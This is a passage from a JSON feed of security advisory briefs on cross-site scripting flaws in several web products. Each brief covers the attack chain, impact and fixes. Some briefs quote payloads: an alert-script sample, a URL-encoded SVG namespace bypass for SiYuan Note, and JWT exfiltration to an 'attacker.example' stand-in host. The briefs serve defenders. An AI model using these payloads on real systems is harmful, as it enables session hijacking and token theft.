user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe script executes within the context of the user\u0026rsquo;s session, potentially stealing cookies or other sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the stolen credentials or session to perform unauthorized actions within the ManageEngine Exchange Reporter Plus application, such as accessing sensitive reports or modifying configurations.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this Stored XSS vulnerability allows an attacker to compromise user accounts and potentially gain administrative access to the ManageEngine Exchange Reporter Plus application. This can lead to unauthorized access to sensitive Exchange environment data, including email addresses, distribution list memberships, and other configuration details. Given the broad adoption of ManageEngine products, this vulnerability could impact numerous organizations relying on Exchange Reporter Plus for monitoring and reporting. The impact is magnified because the injected script is stored, affecting multiple users who view the compromised report.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade ManageEngine Exchange Reporter Plus to version 5802 or later to patch CVE-2026-28754.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious URI Access to Distribution List Reports\u003c/code\u003e to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization on the Distribution Lists report generation page to prevent the injection of malicious scripts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T11:17:05Z","date_published":"2026-04-03T11:17:05Z","id":"/briefs/2026-04-manageengine-xss/","summary":"Zohocorp ManageEngine Exchange Reporter Plus versions before 5802 are vulnerable to Stored XSS in the Distribution Lists report, allowing attackers to inject malicious scripts.","title":"ManageEngine Exchange Reporter Plus Stored XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-manageengine-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.9,"id":"CVE-2026-34571"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["xss","web-application","cve-2026-34571"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCI4MS, a CodeIgniter 4-based CMS skeleton designed for production environments, is vulnerable to a stored XSS flaw within its backend user management system. Versions prior to 0.31.0.0 fail to adequately sanitize user-supplied input before rendering it in the administrative interface. This allows a malicious actor to inject persistent JavaScript code that executes automatically whenever a backend user accesses the compromised page. Successful exploitation grants the attacker the ability to hijack user sessions, escalate privileges to gain higher access levels, and potentially achieve complete control over administrative accounts. Users are advised to upgrade to version 0.31.0.0 or later to mitigate this vulnerability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker authenticates to the CI4MS backend with sufficient privileges to modify user profiles or other data within the user management section.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious JavaScript code into a user profile field, such as the \u0026ldquo;username,\u0026rdquo; \u0026ldquo;email,\u0026rdquo; or any other editable field that is not properly sanitized.\u003c/li\u003e\n\u003cli\u003eThe crafted payload is submitted and stored in the CI4MS database without proper encoding or sanitization.\u003c/li\u003e\n\u003cli\u003eA backend administrator logs into the CI4MS administrative interface and navigates to the user management section.\u003c/li\u003e\n\u003cli\u003eThe vulnerable page retrieves the unsanitized data containing the malicious JavaScript from the database and renders it in the administrator\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript code executes within the administrator\u0026rsquo;s browser session, allowing the attacker to perform actions on behalf of the administrator.\u003c/li\u003e\n\u003cli\u003eThe attacker can steal the administrator\u0026rsquo;s session cookie, allowing them to bypass authentication and gain persistent access to the administrative interface.\u003c/li\u003e\n\u003cli\u003eWith administrative access, the attacker can install malware, modify system configurations, or exfiltrate sensitive data.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this stored XSS vulnerability in CI4MS can have severe consequences, potentially leading to complete compromise of the affected system. An attacker could gain full control over administrative accounts, allowing them to modify website content, install malicious plugins, or steal sensitive data. The vulnerability poses a significant risk to organizations using vulnerable versions of CI4MS to manage their websites.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade CI4MS to version 0.31.0.0 or later to patch the vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect CI4MS XSS Attempt via HTTP POST\u003c/code\u003e to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eImplement input validation and output encoding/escaping on all user-supplied data within the CI4MS application to prevent future XSS vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T22:16:21Z","date_published":"2026-04-01T22:16:21Z","id":"/briefs/2026-04-ci4ms-xss/","summary":"A stored cross-site scripting (XSS) vulnerability in CI4MS versions prior to 0.31.0.0 allows attackers to inject persistent JavaScript code into the backend user management functionality, leading to session hijacking, privilege escalation, and full administrative account compromise.","title":"CI4MS Stored XSS Vulnerability in User Management","url":"https://feed.craftedsignal.io/briefs/2026-04-ci4ms-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","filebrowser","cve-2026-34529"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eFile Browser is a file management interface used for uploading, deleting, previewing, renaming, and editing files. A stored XSS vulnerability, identified as CVE-2026-34529, exists within the EPUB preview functionality of File Browser versions prior to 2.62.2. An attacker can exploit this vulnerability by crafting a malicious EPUB file containing embedded JavaScript. When a user previews the malicious EPUB file through the File Browser interface, the embedded JavaScript executes within their browser, potentially leading to session hijacking, defacement, or redirection to malicious websites. This vulnerability has been addressed in File Browser version 2.62.2.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious EPUB file containing embedded JavaScript designed for XSS exploitation.\u003c/li\u003e\n\u003cli\u003eAttacker uploads the malicious EPUB file to a File Browser instance. This could be achieved if the attacker has write access to the file system, via compromised credentials or anonymous upload functionality (if enabled).\u003c/li\u003e\n\u003cli\u003eA legitimate user, with access to the File Browser, navigates to the directory containing the malicious EPUB file.\u003c/li\u003e\n\u003cli\u003eThe user previews the EPUB file using the File Browser\u0026rsquo;s built-in preview function.\u003c/li\u003e\n\u003cli\u003eThe File Browser processes the EPUB file, triggering the vulnerable code in the EPUB preview functionality.\u003c/li\u003e\n\u003cli\u003eThe embedded JavaScript within the EPUB file executes in the user\u0026rsquo;s browser in the context of the File Browser application.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s JavaScript payload can then perform actions such as stealing cookies, redirecting the user, or defacing the File Browser interface.\u003c/li\u003e\n\u003cli\u003eThe attacker can use the stolen cookies to impersonate the user or further compromise the File Browser instance.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary JavaScript code within the context of a user\u0026rsquo;s browser. This can lead to session hijacking, where an attacker steals a user\u0026rsquo;s session cookie and impersonates them, potentially gaining unauthorized access to sensitive files and system resources. Further consequences include defacement of the File Browser interface, redirection of users to malicious websites, and potentially further compromise of the server hosting the File Browser application depending on the permissions of the compromised user account.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade File Browser instances to version 2.62.2 or later to patch the XSS vulnerability (CVE-2026-34529).\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization on file uploads to prevent the injection of malicious code.\u003c/li\u003e\n\u003cli\u003eConsider deploying a Content Security Policy (CSP) to restrict the execution of JavaScript from untrusted sources.\u003c/li\u003e\n\u003cli\u003eEnable logging on the webserver hosting File Browser to capture details of requests for EPUB files, which can be used to detect exploitation attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T21:17:00Z","date_published":"2026-04-01T21:17:00Z","id":"/briefs/2026-04-filebrowser-xss/","summary":"File Browser versions prior to 2.62.2 are vulnerable to stored cross-site scripting (XSS) via the EPUB preview function, allowing attackers to execute arbitrary JavaScript in a user's browser by embedding malicious code in a crafted EPUB file.","title":"File Browser EPUB Preview Stored XSS Vulnerability (CVE-2026-34529)","url":"https://feed.craftedsignal.io/briefs/2026-04-filebrowser-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.7,"id":"CVE-2026-34748"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","cve-2026-34748","payloadcms"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ePayload CMS is a free and open-source headless content management system. Prior to version 3.78.0, a stored Cross-Site Scripting (XSS) vulnerability (CVE-2026-34748) existed in the admin panel of @payloadcms/next. This vulnerability allows an authenticated user with write access to a collection to save malicious content, which, when viewed by another user, results in arbitrary JavaScript execution within their browser. Successful exploitation can lead to session hijacking, defacement, or other malicious actions performed on behalf of the victim user. The vulnerability was patched in version 3.78.0. This issue poses a risk to any organization using Payload CMS, particularly those where multiple users with differing levels of trust interact with the content management system.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to the Payload CMS admin panel with write access to a collection.\u003c/li\u003e\n\u003cli\u003eAttacker crafts malicious content containing a JavaScript payload, such as \u003ccode\u003e\u0026lt;script\u0026gt;alert(\u0026quot;XSS\u0026quot;)\u0026lt;/script\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker saves the malicious content within a collection in the CMS through the admin panel interface, likely using a text field or similar input.\u003c/li\u003e\n\u003cli\u003eThe CMS stores the malicious content in its database without proper sanitization or output encoding.\u003c/li\u003e\n\u003cli\u003eA different, authenticated user accesses the collection containing the attacker\u0026rsquo;s malicious content through the admin panel using their web browser.\u003c/li\u003e\n\u003cli\u003eThe CMS retrieves the malicious content from the database and renders it in the victim user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s browser executes the injected JavaScript code within the context of the Payload CMS web application.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves XSS, potentially gaining access to the victim\u0026rsquo;s session cookies, defacing the admin panel, or redirecting the user to a phishing site.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this stored XSS vulnerability (CVE-2026-34748) in Payload CMS can lead to several negative consequences. An attacker can hijack the session of an administrator, potentially gaining full control over the CMS and its managed content. The attacker can also deface the admin panel, inject malicious links, or redirect users to phishing sites. Given the nature of content management systems, a successful XSS attack could lead to widespread distribution of malicious content to website visitors, ultimately harming the organization\u0026rsquo;s reputation and potentially leading to data breaches.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Payload CMS to version 3.78.0 or later to patch CVE-2026-34748, as indicated in the overview.\u003c/li\u003e\n\u003cli\u003eImplement a Content Security Policy (CSP) to restrict the sources from which the browser is permitted to load resources to mitigate potential XSS exploitation.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule targeting script tag injection within HTTP request parameters to detect potential exploitation attempts against web applications.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for unusual activity related to the Payload CMS admin panel, focusing on requests containing potentially malicious JavaScript code.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T20:16:27Z","date_published":"2026-04-01T20:16:27Z","id":"/briefs/2026-04-payloadcms-xss/","summary":"A stored Cross-Site Scripting (XSS) vulnerability exists in Payload CMS versions prior to 3.78.0, allowing authenticated users with write access to inject malicious scripts that execute in the browsers of other users.","title":"Payload CMS Stored XSS Vulnerability (CVE-2026-34748)","url":"https://feed.craftedsignal.io/briefs/2026-04-payloadcms-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["sonicwall","email security","xss","dos","data manipulation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eMultiple vulnerabilities in the SonicWall Email Security Appliance allow a remote, authenticated attacker with administrative privileges to perform various malicious actions. This includes cross-site scripting (XSS) attacks, data manipulation, and denial-of-service (DoS) conditions. This poses a significant threat to organizations using the affected appliance as it can lead to data breaches, service disruption, and unauthorized access. Defenders should prioritize patching and implementing detection mechanisms to mitigate these risks, though no version information or CVEs are given.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the SonicWall Email Security Appliance with administrative privileges through compromised credentials or exploiting an authentication bypass vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a cross-site scripting (XSS) vulnerability to inject malicious scripts into web pages viewed by other administrators.\u003c/li\u003e\n\u003cli\u003eThe injected XSS scripts execute within the context of other administrator sessions, allowing the attacker to steal credentials or perform actions on their behalf.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a data manipulation vulnerability to modify sensitive data stored within the appliance, potentially altering email configurations or security settings.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a separate vulnerability to trigger a denial-of-service (DoS) condition, rendering the email security appliance unavailable to users.\u003c/li\u003e\n\u003cli\u003eThe DoS condition disrupts email flow, preventing users from sending or receiving messages.\u003c/li\u003e\n\u003cli\u003eThrough data manipulation and XSS, the attacker gains persistent control over the Email Security Appliance.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could lead to unauthorized access to sensitive email data, manipulation of email security settings, and complete disruption of email services. The lack of specifics makes it impossible to determine the exact number of victims or specific sectors targeted. However, any organization using the SonicWall Email Security Appliance is potentially at risk. This can result in significant financial losses, reputational damage, and legal liabilities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor SonicWall Email Security Appliance logs for suspicious activity indicative of unauthorized access or data manipulation.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect potential XSS attacks against the SonicWall Email Security Appliance web interface.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect unauthorized changes to system files commonly associated with data manipulation attacks.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T10:39:09Z","date_published":"2026-04-01T10:39:09Z","id":"/briefs/2024-01-sonicwall-email-security-vulns/","summary":"A remote, authenticated attacker with administrator rights can exploit multiple vulnerabilities in SonicWall Email Security Appliance to perform cross-site scripting, manipulate data, or cause a denial-of-service.","title":"SonicWall Email Security Appliance Multiple Vulnerabilities","url":"https://feed.craftedsignal.io/briefs/2024-01-sonicwall-email-security-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["vulnerability","dos","xss","ibm"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eMultiple vulnerabilities have been identified in IBM App Connect Enterprise that could be exploited by a remote, anonymous attacker. Successful exploitation could lead to a denial-of-service (DoS) condition, rendering the application unavailable, or the bypass of existing security measures. The security bypass could enable cross-site scripting (XSS) attacks, potentially compromising user data and system integrity. IBM App Connect Enterprise is an integration platform that connects applications and data across a variety of environments, making it a critical component for many organizations. The lack of specific CVEs in the advisory makes patching and specific detection challenging but highlights the need for broad monitoring of related activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable IBM App Connect Enterprise instance exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious request designed to exploit a specific vulnerability.\u003c/li\u003e\n\u003cli\u003eThe malicious request is sent to the vulnerable IBM App Connect Enterprise server.\u003c/li\u003e\n\u003cli\u003eIf the attack targets a DoS vulnerability, the server becomes overwhelmed with the malicious request, leading to service disruption.\u003c/li\u003e\n\u003cli\u003eIf the attack targets a security bypass, the attacker injects malicious code into the application.\u003c/li\u003e\n\u003cli\u003eThe injected code executes in the context of a user\u0026rsquo;s session.\u003c/li\u003e\n\u003cli\u003eThe attacker steals sensitive information or performs actions on behalf of the user (XSS).\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities can have significant consequences, potentially disrupting critical business processes dependent on IBM App Connect Enterprise. While the exact number of affected organizations remains unknown, the widespread use of this platform suggests a potentially large impact. A successful DoS attack can lead to downtime and financial losses. A successful XSS attack can lead to data breaches, compromised user accounts, and further exploitation of internal systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious HTTP requests targeting IBM App Connect Enterprise, looking for unusual patterns or malformed URLs (category: \u003ccode\u003ewebserver\u003c/code\u003e, product: \u003ccode\u003elinux\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eImplement and tune the provided Sigma rule to detect potential XSS attempts by monitoring for common XSS payloads in HTTP request parameters.\u003c/li\u003e\n\u003cli\u003eReview IBM\u0026rsquo;s official security advisories for specific patch information as it becomes available, and apply patches immediately to mitigate these vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T09:21:09Z","date_published":"2026-04-01T09:21:09Z","id":"/briefs/2026-04-ibm-app-connect/","summary":"A remote, anonymous attacker can exploit multiple vulnerabilities in IBM App Connect Enterprise to cause a denial-of-service condition or bypass security measures, enabling cross-site scripting attacks.","title":"IBM App Connect Enterprise Multiple Vulnerabilities","url":"https://feed.craftedsignal.io/briefs/2026-04-ibm-app-connect/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","siyuan","svg","reflected-xss"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eSiYuan Note, a note-taking application, is susceptible to a reflected XSS vulnerability in its dynamic icon generation functionality. This flaw, present in versions prior to commit f09953afc57a, arises from an insufficient sanitization of SVG content, specifically failing to account for namespace prefixes in SVG elements. The vulnerability resides in the \u003ccode\u003e/api/icon/getDynamicIcon\u003c/code\u003e endpoint, which is accessible without authentication.  An attacker can exploit this by crafting a malicious SVG payload containing namespaced \u003ccode\u003e\u0026lt;script\u0026gt;\u003c/code\u003e tags (e.g., \u003ccode\u003e\u0026lt;x:script xmlns:x=\u0026quot;http://www.w3.org/2000/svg\u0026quot;\u0026gt;\u003c/code\u003e), which bypasses the application\u0026rsquo;s XSS mitigation measures. Successful exploitation allows arbitrary JavaScript execution within the context of the victim\u0026rsquo;s SiYuan Note instance, potentially leading to data theft or other malicious activities.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious URL targeting the \u003ccode\u003e/api/icon/getDynamicIcon\u003c/code\u003e endpoint with the \u003ccode\u003etype=8\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe crafted URL includes a \u003ccode\u003econtent\u003c/code\u003e parameter containing a specially crafted SVG payload. This SVG payload leverages a namespace prefix to bypass the \u003ccode\u003eSanitizeSVG\u003c/code\u003e function\u0026rsquo;s intended filtering, e.g., \u003ccode\u003e%3C%2Fx%3Ascript%20xmlns%3Ax%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3Ealert%28document.domain%29%3C%2Fx%3Ascript%3E\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe victim, either unknowingly or through social engineering, opens the malicious URL in their browser.\u003c/li\u003e\n\u003cli\u003eThe SiYuan server processes the request without proper sanitization, inserting the attacker-controlled content into the SVG, and serves the response with \u003ccode\u003eContent-Type: image/svg+xml\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe browser\u0026rsquo;s XML parser interprets the namespace prefix, resolving it to the SVG namespace, and executes the embedded JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe JavaScript code executes within the security context of the SiYuan application (\u003ccode\u003ehttp://\u0026lt;siyuan-host\u0026gt;:6806\u003c/code\u003e), due to \u003ccode\u003eAccess-Control-Allow-Origin: *\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s script can now interact with the SiYuan API using the victim\u0026rsquo;s session cookies.\u003c/li\u003e\n\u003cli\u003eThe attacker can perform actions such as reading notes, exporting data, or modifying settings without authentication.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis vulnerability poses a significant risk to SiYuan Note users, particularly those whose instances are reachable on a local network. An attacker could potentially compromise sensitive information, manipulate user data, or gain unauthorized access to the application. The ease of exploitation and the absence of authentication requirements make this vulnerability particularly dangerous. Because SiYuan sets \u003ccode\u003eAccess-Control-Allow-Origin: *\u003c/code\u003e and the script runs same-origin, it can call any API endpoint using the victim\u0026rsquo;s existing session cookies, including endpoints to read all notes, export data, or modify settings.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade SiYuan Note to a version that includes the fix for commit f09953afc57a to remediate the vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect SiYuan SVG XSS Attempt\u0026rdquo; to identify potential exploitation attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for requests to \u003ccode\u003e/api/icon/getDynamicIcon\u003c/code\u003e containing SVG payloads with namespace-prefixed script tags, as demonstrated in the PoC.\u003c/li\u003e\n\u003cli\u003eConsider implementing a Content Security Policy (CSP) on the SiYuan server to restrict the execution of inline JavaScript.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-01T00:30:01Z","date_published":"2026-04-01T00:30:01Z","id":"/briefs/2026-04-siyuan-xss/","summary":"SiYuan Note versions prior to the fix for commit f09953afc57a are vulnerable to reflected cross-site scripting (XSS) via a namespace prefix bypass in the SanitizeSVG function when handling dynamic icons, allowing unauthenticated attackers to execute arbitrary JavaScript in a victim's browser.","title":"SiYuan Note Reflected XSS Vulnerability in SVG Processing","url":"https://feed.craftedsignal.io/briefs/2026-04-siyuan-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":4.8,"id":"CVE-2024-35236"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["filebrowser","xss","epub","cve-2026-34529"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eFile Browser, a web-based file management application, is susceptible to stored XSS attacks in versions 2.62.1 and earlier. The vulnerability stems from the application\u0026rsquo;s EPUB preview functionality, which allows scripted content (\u003ccode\u003eallowScriptedContent: true\u003c/code\u003e) to execute within an iframe.  The iframe\u0026rsquo;s sandbox is misconfigured, including both \u003ccode\u003eallow-scripts\u003c/code\u003e and \u003ccode\u003eallow-same-origin\u003c/code\u003e, effectively bypassing the intended security restrictions. An attacker can upload a specially crafted EPUB file containing malicious JavaScript code. When a user previews the file, the embedded JavaScript executes in their browser, enabling session hijacking via JWT token theft, data exfiltration, and potential privilege escalation if the victim is an administrator.  This vulnerability is similar to CVE-2024-35236 found in audiobookshelf, highlighting a recurring pattern of insecure EPUB handling.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious EPUB file containing embedded JavaScript designed to steal JWT tokens and exfiltrate data.\u003c/li\u003e\n\u003cli\u003eThe attacker authenticates to the File Browser application with a valid, potentially low-privilege, user account.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the malicious EPUB file to the File Browser server via the \u003ccode\u003e/api/resources\u003c/code\u003e endpoint, potentially overwriting existing files using the \u003ccode\u003eoverride=true\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eThe server stores the malicious EPUB file.\u003c/li\u003e\n\u003cli\u003eA victim, potentially an administrator, views the uploaded EPUB file through the File Browser\u0026rsquo;s web interface, triggering the EPUB preview function.\u003c/li\u003e\n\u003cli\u003eThe application renders the EPUB file within an iframe. Due to the \u003ccode\u003eallowScriptedContent\u003c/code\u003e setting and misconfigured sandbox, the embedded JavaScript executes.\u003c/li\u003e\n\u003cli\u003eThe JavaScript steals the victim\u0026rsquo;s JWT token from \u003ccode\u003ewindow.parent.localStorage\u003c/code\u003e and exfiltrates it to an attacker-controlled server (\u003ccode\u003ehttps://attacker.example/?stolen=\u003c/code\u003e). It may also attempt to gather additional information, such as the victim\u0026rsquo;s public IP address by requesting \u003ccode\u003ehttps://ifconfig.me/ip\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen JWT token to hijack the victim\u0026rsquo;s session, potentially gaining administrative privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability allows attackers to steal JWT tokens, leading to full session hijacking and potential privilege escalation. A low-privilege user with upload permissions can compromise administrator accounts. This can lead to unauthorized access to sensitive files, data exfiltration, and modification or deletion of critical data. The vulnerability affects File Browser instances version 2.62.1 and earlier.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply patches or upgrade File Browser to a version greater than 2.62.1 to mitigate CVE-2026-34529.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect File Browser EPUB XSS Attempt\u003c/code\u003e to identify potential exploitation attempts by monitoring for network connections to \u003ccode\u003eifconfig.me\u003c/code\u003e originating from the File Browser application.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect File Browser JWT Exfiltration\u003c/code\u003e to detect potential exfiltration of JWT tokens by monitoring network connections to \u003ccode\u003eattacker.example\u003c/code\u003e with a \u003ccode\u003estolen\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eDisable EPUB preview functionality or sanitize EPUB files before rendering them to prevent the execution of malicious scripts. This addresses the root cause by preventing attacker-controlled JavaScript execution.\u003c/li\u003e\n\u003cli\u003eReview and harden the iframe sandbox configuration used for EPUB previews to restrict access to sensitive resources and prevent script execution, if preview functionality cannot be disabled.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-31T23:44:36Z","date_published":"2026-03-31T23:44:36Z","id":"/briefs/2024-07-filebrowser-xss/","summary":"File Browser version 2.62.1 and earlier is vulnerable to stored cross-site scripting (XSS) via crafted EPUB files, allowing attackers to execute arbitrary JavaScript in a victim's browser by exploiting the application's misconfigured iframe sandbox and stealing sensitive information like JWT tokens.","title":"File Browser Stored XSS via Crafted EPUB File","url":"https://feed.craftedsignal.io/briefs/2024-07-filebrowser-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-4267"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["wordpress","xss","reflected-xss","cve-2026-4267"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Query Monitor plugin for WordPress, a developer tool panel, is susceptible to a reflected Cross-Site Scripting (XSS) vulnerability. Identified as CVE-2026-4267, this flaw exists in all versions up to and including 3.20.3. The vulnerability arises from the plugin\u0026rsquo;s failure to adequately sanitize input and escape output related to the \u003ccode\u003e$_SERVER['REQUEST_URI']\u003c/code\u003e parameter. An unauthenticated attacker can exploit this by injecting malicious web scripts into pages, posing a threat to users who…\u003c/p\u003e\n","date_modified":"2026-03-31T12:16:31Z","date_published":"2026-03-31T12:16:31Z","id":"/briefs/2024-01-query-monitor-xss/","summary":"The Query Monitor WordPress plugin is vulnerable to reflected cross-site scripting (XSS) due to insufficient input sanitization and output escaping of the '$_SERVER['REQUEST_URI']' parameter, allowing unauthenticated attackers to inject arbitrary web scripts.","title":"Query Monitor WordPress Plugin Vulnerable to Reflected XSS (CVE-2026-4267)","url":"https://feed.craftedsignal.io/briefs/2024-01-query-monitor-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.7,"id":"CVE-2025-10553"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["xss","vulnerability","web-application"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA stored cross-site scripting (XSS) vulnerability has been identified in DELMIA Factory Resource Manager, affecting versions from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x. This vulnerability, assigned CVE-2025-10553, allows an attacker to inject malicious JavaScript code into the application. When a user interacts with the affected component, the injected script executes within their browser, potentially leading to session hijacking, sensitive data theft, or defacement of…\u003c/p\u003e\n","date_modified":"2026-03-31T09:18:30Z","date_published":"2026-03-31T09:18:30Z","id":"/briefs/2026-04-delmia-xss/","summary":"A stored cross-site scripting (XSS) vulnerability in DELMIA Factory Resource Manager from Release 3DEXPERIENCE R2023x through Release 3DEXPERIENCE R2025x (CVE-2025-10553) allows attackers to execute arbitrary script code within a user's browser session.","title":"DELMIA Factory Resource Manager Stored XSS Vulnerability 